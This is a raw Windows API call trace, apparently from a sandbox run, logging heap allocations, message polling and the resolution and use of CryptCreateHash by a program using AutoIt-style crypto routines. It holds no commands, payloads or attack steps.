RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0230.264] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.264] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0230.265] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.265] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.265] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0230.265] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0230.265] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.265] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.265] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0230.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0230.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0230.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0230.266] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0230.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0230.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0230.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0230.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0230.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.268] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0230.268] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.268] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.268] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.268] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.268] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.268] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0230.268] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0230.268] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.268] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0230.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0230.269] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0230.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0230.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0230.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0230.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.269] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.269] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.269] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0230.269] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0230.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0230.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0230.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51490, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0230.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0230.360] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0230.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0230.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0230.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0230.361] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0230.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0230.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0230.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0230.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0230.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0230.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0230.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0230.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0230.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0230.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0230.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0230.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0230.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0230.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0230.364] RtlAllocateHeap 